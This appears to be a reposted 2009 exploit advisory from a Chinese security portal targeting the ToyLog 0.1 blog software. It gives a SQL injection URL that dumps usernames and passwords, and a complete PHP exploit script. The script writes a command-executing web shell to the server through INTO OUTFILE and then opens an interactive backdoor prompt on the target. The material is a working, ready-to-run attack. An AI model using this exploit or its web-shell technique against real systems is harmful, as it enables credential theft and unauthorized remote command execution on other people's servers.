首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ToyLog 0.1 SQL Injection Vulnerability/RCE Exploit
来源:http://darkjoker.net23.net 作者:darkjoker 发布时间:2009-07-13  

--+++=====================================================================================+++--
--+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++--
--+++=====================================================================================+++--

[+] SQL Injection Vulnerability
Url: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user

[+] Remote Command Execution Exploit

#!/usr/bin/php
<?php

function usage () {
 exit ( "\n".
  "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n".
  "-                                                   -\n".
  "+ ToyLog 0.1 Remote Command Execution Exploit       +\n".
  "- Author  : darkjoker                               -\n".
  "+ Site    : http://darkjoker.net23.net              +\n".
  "- Download: http://sourceforge.net/projects/toylog/ -\n".
  "+ Usage   : php xpl.php <url>                       +\n".
  "- Ex.     : php xpl.php http://localhost/ToyLog/    -\n".
  "+                                                   +\n".
  "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
  "\n");
}

function hex_format ($string) {
 $i=0;
 while ($i<strlen($string))
  $hex .= "%".dechex(ord($string[$i++]));
 return $hex;
}

function get_path ($host, $dir) {
 $fp = fsockopen ($host, 80);
 $query = hex_format ("1 UNION ALL SELECT * FROM does_not_exist");
 $req = "GET {$dir}read.php?idm={$query} HTTP/1.1\r\n".
  "Host: {$host}\r\n".
  "Connection: Close\r\n\r\n";
 fputs ($fp, $req);
 while (!feof ($fp))
  if (preg_match ("|resource in <b>(.+?)</b> on|", fgets ($fp, 1024), $data))
   $path = $data [1];
 list ($path) = explode ("block/db.php", $path);
 fclose ($fp);
 return $path;
}

function upload_shell ($host, $dir) {
 $fp = fsockopen ($host, 80);
 $shell_path = get_path ($host, $dir)."shell.php";
 if (!strcmp ($shell_path, "shell.php"))
  die ("[-] Exploit failed.\n");
 $query = hex_format('1 UNION ALL SELECT 1,2,\'xxx<?php system (stripslashes($_GET[\\\'cmd\\\'])); ?>xxx\',4 INTO OUTFILE \''.$shell_path.'\' FROM post');
 $req = "GET {$dir}read.php?idm={$query} HTTP/1.1\r\n".
  "Host: {$host}\r\n".
  "Connection: Close\r\n\r\n";
 fputs ($fp, $req);
 fclose ($fp);
}

if (!preg_match ("|http://(.+?)(/.+/)|", $argv [1], $data))
 usage ();
array_shift ($data);
list ($host, $dir) = $data;
upload_shell ($host, $dir);
$stdin = fopen ("php://stdin", "r");
while (1) {
 echo "backdoor@{$host}: ";
 $cmd = hex_format(trim (fgets ($stdin, 1024)));
 if (!strcmp ($cmd, hex_format("exit")))
  break;
 $out = explode ("xxx", file_get_contents ("http://{$host}{$dir}shell.php?cmd={$cmd}"));
 array_shift ($out);
 array_pop ($out);
 echo $out [0];
}

?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Internet Explorer 7 Video A
·OtsAv DJ/TV/Radio Multiple Loc
·Photo DVD Maker Pro <= 8.02 (.
·eEye Retina WiFi Security Scan
·PatPlayer 3.9 (M3U File) Local
·AwingSoft Web3D Player (WindsP
·Microsoft Internet Explorer (A
·Linux/x86 Port Binding Shellco
·Universe CMS 1.0.6 (vnews.php
·Morcego CMS <= 1.7.6 Remote Bl
·TalkBack 2.3.14 Multiple Remot
·M3U/M3L to ASX/WPL 1.1 (ASX,M
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved